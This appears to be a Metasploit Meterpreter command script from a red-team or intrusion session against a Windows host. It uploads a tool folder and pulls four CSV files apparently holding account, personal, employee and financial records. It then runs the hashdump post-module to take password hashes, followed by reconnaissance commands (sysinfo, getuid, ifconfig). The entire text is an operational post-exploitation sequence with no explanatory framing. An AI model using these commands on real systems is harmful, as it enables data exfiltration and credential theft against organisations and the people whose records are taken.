upload /root/redteam C:\\redteam
download C:\\TeamXAccount.csv
download C:\\TeamXPersonal.csv
download C:\\TeamXEmployees.csv
download C:\\TeamXFinancial.csv
run post/windows/gather/hashdump 
sysinfo
getuid
ifconfig